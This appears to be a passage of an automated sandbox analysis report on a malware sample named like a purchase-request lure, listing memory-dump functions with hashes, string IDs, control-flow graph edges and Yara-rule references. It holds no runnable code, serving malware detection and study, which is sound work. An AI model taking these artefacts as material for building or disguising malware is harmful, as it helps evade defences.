                                                                                                                                                                                                • API String ID: 0-1926143806
                                                                                                                                                                                                • Opcode ID: 2bc5edf33266bd5107d49a902146e7f1eff7e7710cb1ed11e53d83b51e540584
                                                                                                                                                                                                • Instruction ID: 61f9131d37dec5a8380639d06e4f278a4c6d6184b4714b0094b2217ea95e29c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bc5edf33266bd5107d49a902146e7f1eff7e7710cb1ed11e53d83b51e540584
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C512974E0521A8FDB48CFA9D5405AEFBF2FF89300F14D16AD519E7254D7348A81CBA4
                                                                                                                                                                                                Function 0682CF11 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                                • Opcode ID: c27d1738bef732cbeda082a9f4d34bfe4954d93a9283fba4b1078e257b2487d5
                                                                                                                                                                                                • Instruction ID: 48a5c2f1d1f8d114305907964e00d31e9a3b6e7aab8395497f637a26b952ac5f
                                                                                                                                                                                                • Opcode Fuzzy Hash: c27d1738bef732cbeda082a9f4d34bfe4954d93a9283fba4b1078e257b2487d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D51F6B5E057588FDB59CFAAC8446DDBBF2AF89300F04C0AAD508EB265DB345A85CF00
                                                                                                                                                                                                Function 0682F480 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: >NG
                                                                                                                                                                                                • API String ID: 0-1926143806
                                                                                                                                                                                                • Opcode ID: ec8836148d44764f9bb013b709f0ef73735ce39a384cd6e37f91ad4ae5394258
                                                                                                                                                                                                • Instruction ID: afe3d21325489f5f83a31085ba77477ab997582c1d8c8b3f70a6fc8aa275e0bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: ec8836148d44764f9bb013b709f0ef73735ce39a384cd6e37f91ad4ae5394258
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8510774E0521A8FDB48CFA9C5415AEFBF2BF88200F14D12AD619E7254D7349A81CBA4
                                                                                                                                                                                                Function 0682CF50 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                                • Opcode ID: 26e87fe2a911fffee0b6bfcf84f8f0b2eeb5f8cb55bf78d1ee0fb960f9511748
                                                                                                                                                                                                • Instruction ID: 9ed81669482753367fb1989f4136bce4e3b7475cdf6000c79377cac634330a22
                                                                                                                                                                                                • Opcode Fuzzy Hash: 26e87fe2a911fffee0b6bfcf84f8f0b2eeb5f8cb55bf78d1ee0fb960f9511748
                                                                                                                                                                                                • Instruction Fuzzy Hash: 415184B5E01658CFDB58CFAAC9446DDBBF2AFC9305F14C0AAD509AB224DB305A85CF40
                                                                                                                                                                                                Function 066576E8 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477577013.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6650000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 73fb39cd0b24730ade55d0ca68d37fdc5576b52ff107baf574402be3413b101e
                                                                                                                                                                                                • Instruction ID: 19e4aba3f2f8f666931bbfe04deffacd38b906d9465a1cb9e462a708b2907d6f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 73fb39cd0b24730ade55d0ca68d37fdc5576b52ff107baf574402be3413b101e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E527C70A003158FDB54DF68C844B98B7F2FF89314F2586A9D5586F3A1DB71A982CF81
                                                                                                                                                                                                Function 066576D3 Relevance: .6, Instructions: 586COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477577013.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6650000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d0afd3700dc1274f04b9862a60a11dbd723204b308e9090202fed89721f272a7
                                                                                                                                                                                                • Instruction ID: 7d75d2a82febe47985cca36144f77339c75e97f8add860c17fb3d613ee8229f3
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0afd3700dc1274f04b9862a60a11dbd723204b308e9090202fed89721f272a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: E9527D70A003568FDB54DF68C844B98B7F2FF85314F2586A9D5586F3A2DB71A982CF80
                                                                                                                                                                                                Function 0172B749 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 95c983952d3288f70d1e96b7bf14b559c1d1d9f0f16110067dc2e5f24099f0c3
                                                                                                                                                                                                • Instruction ID: 28d591c4d754febffde0cdd39aabafa7703cb731618276c722481a5d8814797c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 95c983952d3288f70d1e96b7bf14b559c1d1d9f0f16110067dc2e5f24099f0c3
                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF17474A00228CFE724DF69C894BADB7B2FF44310F1484A9D10AAB395DB759D86CF51
                                                                                                                                                                                                Function 0172B7A5 Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 91e837e8d8a086468206ab0f7d25bc9887bff3c4f935ad5f2943ea31d8d4d2a0
                                                                                                                                                                                                • Instruction ID: 29644692d78ab61b4296370b7b0cadcb6cf97586fe42fc35cd6c979269ff7ae9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e837e8d8a086468206ab0f7d25bc9887bff3c4f935ad5f2943ea31d8d4d2a0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF17174A00228CFDB64DF69C894BADB7B2FF84310F1484A9D10AAB395DB759D82CF51
                                                                                                                                                                                                Function 080A6C79 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 058147c7cc036f050c7623e7423270d2bc8d6f250196e26f0a0d229e72579637
                                                                                                                                                                                                • Instruction ID: 8c9996ae09621897eda29cc45961b3d60666313f4bdcbb7cd8fa365a1414340d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 058147c7cc036f050c7623e7423270d2bc8d6f250196e26f0a0d229e72579637
                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF12574E052698FCB65CF69C884B9DBBB6BF88340F1495AAD41EA7254D770AEC1CF00
                                                                                                                                                                                                Function 0172B8E7 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 53101c47d6ccfb755201e855988f8d5df786f60dd3c129e0a9500de289e00048
                                                                                                                                                                                                • Instruction ID: 786701053620c229d20921f31571931eaea9198beec9d04b103eb5f9f482606f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 53101c47d6ccfb755201e855988f8d5df786f60dd3c129e0a9500de289e00048
                                                                                                                                                                                                • Instruction Fuzzy Hash: E0C14170E00228CFEB24DF69C894BADB7B2FF84314F1484A9D109AB295DB759D86CF51
                                                                                                                                                                                                Function 0172B94A Relevance: .3, Instructions: 279COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3ba8179204ff5348e7e0bb4122ab6b0ad46f868002dd7d377e3b65858482c024
                                                                                                                                                                                                • Instruction ID: a4178834558c7461032b60db454c66892f3766f79924e97e89e12fac4f48eb95
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ba8179204ff5348e7e0bb4122ab6b0ad46f868002dd7d377e3b65858482c024
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BB14070E00228CFEB24DF69C894BADB7B2FF84300F1484A9D109AB295DB759D82CF51
                                                                                                                                                                                                Function 080A9B70 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a2748bd7cd74dcfa24e48d323c828e91c54bb41f740c6e2ba5f97d7f2eb3441a
                                                                                                                                                                                                • Instruction ID: a10813dbfeadf1de05b2ff8dca4012d0550e39438d09d50494d93842ea28ffe2
                                                                                                                                                                                                • Opcode Fuzzy Hash: a2748bd7cd74dcfa24e48d323c828e91c54bb41f740c6e2ba5f97d7f2eb3441a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10B11274E05219DBCF08CFE9D9846EDFBB3FB89301F20952AD41AAB258D7349941CB24
                                                                                                                                                                                                Function 080A5FE0 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 21694efc05d3e03f7ecebf0af8ec99f676890a584845b4469423aa04630715ba
                                                                                                                                                                                                • Instruction ID: bb0a8ed52ac7efadd928fbb3c8fae7e600ffc2f02c4dbec80e8268e062ea030e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 21694efc05d3e03f7ecebf0af8ec99f676890a584845b4469423aa04630715ba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77614974D01219DFDB04CFE9D984AAEBBB2FF48302F18952AD422AB350D7759A42CF51
                                                                                                                                                                                                Function 080A5FD0 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4cd2a5afd33b9087eb5535ab0e1eb9e5ce46fe00f54439e8dc535d13e7839dbb
                                                                                                                                                                                                • Instruction ID: 301d5265ec00c7e434c9b3a1046094a25e434beb29e9cf571461db0f93bf4c93
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cd2a5afd33b9087eb5535ab0e1eb9e5ce46fe00f54439e8dc535d13e7839dbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: C1616874D01219DFDB08CFE9D944AAEBBB2FF48306F18952AD422AB250D7758A42CF50
                                                                                                                                                                                                Function 0819EC78 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 577e60eef73c159232b5da41c780d83c1ff7b033b40c84352f9df4a980f75a35
                                                                                                                                                                                                • Instruction ID: 5aa81fe189f1c7697ab36c9473210b0e0352cbeb1b57ad9eb565db17649a6957
                                                                                                                                                                                                • Opcode Fuzzy Hash: 577e60eef73c159232b5da41c780d83c1ff7b033b40c84352f9df4a980f75a35
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9511574D01218CFDB18CFA6C884ADEBBF2FF88311F1085AAD509AB254DB756A85CF50
                                                                                                                                                                                                Function 0819EC69 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 816e83eaf420ed83a11bdf3cf5ab182e49d9f283258a4635348db85fa5dac8e4
                                                                                                                                                                                                • Instruction ID: 559480e2736bf3c300df0a5b5d5b2f3233e580071399eb8e2d94279b3e6ece5e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 816e83eaf420ed83a11bdf3cf5ab182e49d9f283258a4635348db85fa5dac8e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54413974D01658CFDB18CFA6C8946DEBBF2BF88300F14C5AAD409AB258DB746A85CF50
                                                                                                                                                                                                Function 0682DFE8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e44d517eaa3451cf930918bb3eacc4aa5736b46430a4b3c2ace5403fb506e41f
                                                                                                                                                                                                • Instruction ID: 96d5b555352630bd3441c60e17922b644f9f45134a76ec5ce141cceb0af4d27c
                                                                                                                                                                                                • Opcode Fuzzy Hash: e44d517eaa3451cf930918bb3eacc4aa5736b46430a4b3c2ace5403fb506e41f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6531E975E006198BEB58CF6BD85479EBBB3BFC8200F04C5AAD50CA7254DB305A858F25
                                                                                                                                                                                                Function 080A11E0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2bcdb70d058fe28b68b68c789e3eb7e548f5d20c200c14bda4969ff8e44a9c8e
                                                                                                                                                                                                • Instruction ID: 4102f3bbc28272d64ab6c913c7dc7f1cc8715d01b368f5e9c5e11635461237d5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bcdb70d058fe28b68b68c789e3eb7e548f5d20c200c14bda4969ff8e44a9c8e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9321FF71E016189BEB58CFABDC4069EFBF7BFC8200F04C1BAD518A6264EB3419558F55
                                                                                                                                                                                                Function 017280A0 Relevance: 11.8, Strings: 9, Instructions: 587COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                                • API String ID: 0-2735749406
                                                                                                                                                                                                • Opcode ID: afb4174180988ba960ec0cad7c24d78be9027e2c39beb1f6c3c06ad237ecae6d
                                                                                                                                                                                                • Instruction ID: 2f631d2c214c8743920ba01045ea6e65021448df73442b33959f3143d4054ddf
                                                                                                                                                                                                • Opcode Fuzzy Hash: afb4174180988ba960ec0cad7c24d78be9027e2c39beb1f6c3c06ad237ecae6d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C327E30A006248FCB25CF69C884A9EFBF2FF49314F148559E9199B3A2D731ED42CB91
                                                                                                                                                                                                Function 0172D3A8 Relevance: 10.3, Strings: 8, Instructions: 275COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 303 172d3a8-172d3ca 304 172d3ec-172d417 303->304 306 172d743-172d768 304->306 307 172d41d-172d42d 304->307 306->303 307->306 308 172d433-172d440 307->308 309 172d3cc-172d3cf 308->309 311 172d3d1 309->311 312 172d3d8-172d3ea 309->312 311->304 311->312 313 172d5f2-172d5f4 311->313 314 172d695-172d69d 311->314 315 172d6bb-172d6bd 311->315 316 172d598-172d5ae 311->316 317 172d47c-172d480 311->317 318 172d55d-172d57c 311->318 319 172d71d-172d721 311->319 320 172d442-172d458 311->320 321 172d4e2-172d4f6 311->321 322 172d6a2-172d6a8 311->322 323 172d581-172d588 311->323 324 172d5ce-172d5ed 311->324 325 172d4ad-172d4dd 311->325 312->309 337 172d606 313->337 338 172d5f6-172d604 313->338 314->309 329 172d6cf 315->329 330 172d6bf-172d6cd 315->330 316->306 358 172d5b4-172d5c9 316->358 333 172d482-172d48b 317->333 334 172d4a1 317->334 318->309 335 172d723-172d72c 319->335 336 172d737 319->336 320->306 357 172d45e-172d469 320->357 355 172d4f8-172d4fa 321->355 356 172d4fc 321->356 327 172d6b4-172d6b9 322->327 328 172d6aa 322->328 331 172d594-172d596 323->331 332 172d58a 323->332 324->309 325->309 343 172d6af 327->343 328->343 344 172d6d1-172d6f1 329->344 330->344 346 172d58f 331->346 332->346 348 172d492-172d495 333->348 349 172d48d-172d490 333->349 351 172d4a4-172d4aa 334->351 352 172d733 335->352 353 172d72e-172d731 335->353 341 172d73a-172d740 336->341 339 172d608-172d624 337->339 338->339 339->306 366 172d62a-172d65a 339->366 343->309 371 172d6f3-172d705 344->371 372 172d707 344->372 346->309 359 172d49f 348->359 349->359 354 172d735 352->354 353->354 354->341 362 172d4ff-172d520 355->362 356->362 363 172d475-172d47a 357->363 364 172d46b 357->364 358->309 359->351 362->306 376 172d526-172d542 362->376 367 172d470 363->367 364->367 366->306 373 172d660-172d67e 366->373 367->309 375 172d70a-172d718 371->375 372->375 373->306 379 172d684-172d690 373->379 375->309 376->306 381 172d548-172d558 376->381 379->309 381->309
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: LR^q$LR^q$PH^q$PH^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-3757092236
                                                                                                                                                                                                • Opcode ID: 826ecd3a5ac232bb9d18589094e2f4a8baf96b35549115a0dd1d8ade2f93c6fe
                                                                                                                                                                                                • Instruction ID: 75608b717beec7d94f9e5af05d49de0416f8b20fbfb3f25a7d4ab0de5b1fda30
                                                                                                                                                                                                • Opcode Fuzzy Hash: 826ecd3a5ac232bb9d18589094e2f4a8baf96b35549115a0dd1d8ade2f93c6fe
                                                                                                                                                                                                • Instruction Fuzzy Hash: D8B15C70A04129DFCB25CFA9C580AADFBF2FF88300F248555E846AB351D774AD82CB91
                                                                                                                                                                                                Function 01724640 Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 4795 1724640-1724663 4797 1724665-1724668 4795->4797 4798 1724671-172469d 4797->4798 4799 172466a 4797->4799 4875 17246a4-17246a9 4798->4875 4799->4798 4800 1724973-172497a 4799->4800 4801 17248b0-17248bb 4799->4801 4802 17248f6-1724905 4799->4802 4803 1724915-1724931 4799->4803 4804 17246fa 4799->4804 4805 172477b-17247c2 4799->4805 4806 1724818-172481f 4799->4806 4807 17246de-17246e3 4799->4807 4808 172489c-17248a1 4799->4808 4809 1724963 4799->4809 4810 1724941 4799->4810 4811 17248a6-17248ab 4799->4811 4812 17246e5-17246e7 4799->4812 4813 17247ea-17247f1 4799->4813 4814 17246ab-17246c8 4799->4814 4815 172470b-1724742 4799->4815 4816 172486b-1724875 4799->4816 4817 1724888-1724895 4799->4817 4818 1724768-1724778 4799->4818 4819 17248ce-17248e1 4799->4819 4820 172480e-1724813 4799->4820 4821 17246cf-17246dc 4799->4821 4822 172496c-1724971 4799->4822 4848 17248c7-17248cc 4801->4848 4849 17248bd 4801->4849 4854 1724907 4802->4854 4855 172490e-1724913 4802->4855 4847 1724944-1724952 4803->4847 4870 1724933-172493f 4803->4870 4825 17246ff-1724702 4804->4825 4826 17248e3 4805->4826 4880 17247c8-17247d9 4805->4880 4806->4826 4830 1724825-1724847 4806->4830 4807->4797 4808->4825 4886 1724966 call 172b8e7 4809->4886 4887 1724966 call 172b7a5 4809->4887 4888 1724966 call 172bd45 4809->4888 4889 1724966 call 172b94a 4809->4889 4890 1724966 call 172b409 4809->4890 4891 1724966 call 172b749 4809->4891 4810->4847 4811->4825 4823 17246f3-17246f8 4812->4823 4824 17246e9 4812->4824 4813->4826 4827 17247f7-17247fb 4813->4827 4814->4821 4894 1724744 call 1725b70 4815->4894 4895 1724744 call 1725b30 4815->4895 4856 1724881-1724886 4816->4856 4857 1724877 4816->4857 4817->4808 4818->4805 4829 17248e8 4819->4829 4820->4825 4821->4807 4828 1724957-172495a 4822->4828 4833 17246ee 4823->4833 4824->4833 4825->4815 4835 1724704 4825->4835 4826->4829 4837 1724807-172480c 4827->4837 4838 17247fd 4827->4838 4828->4809 4834 172495c 4828->4834 4840 17248ea-17248ed 4829->4840 4878 1724849-172484f 4830->4878 4879 172485f-1724866 4830->4879 4833->4797 4834->4800 4834->4809 4834->4822 4835->4800 4835->4801 4835->4802 4835->4803 4835->4805 4835->4806 4835->4808 4835->4809 4835->4810 4835->4811 4835->4813 4835->4815 4835->4816 4835->4817 4835->4818 4835->4819 4835->4820 4835->4822 4850 1724802 4837->4850 4838->4850 4840->4802 4852 17248ef 4840->4852 4847->4828 4859 17248c2 4848->4859 4849->4859 4850->4825 4852->4800 4852->4802 4852->4803 4852->4809 4852->4810 4852->4822 4861 172490c 4854->4861 4855->4861 4865 172487c 4856->4865 4857->4865 4859->4825 4861->4840 4865->4825 4870->4840 4875->4797 4877 172474a-1724766 4877->4825 4881 1724853-1724855 4878->4881 4882 1724851 4878->4882 4879->4825 4892 17247db call 1725b70 4880->4892 4893 17247db call 1725b30 4880->4893 4881->4879 4882->4879 4884 17247e1-17247e5 4884->4825 4886->4822 4887->4822 4888->4822 4889->4822 4890->4822 4891->4822 4892->4884 4893->4884 4894->4877 4895->4877
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
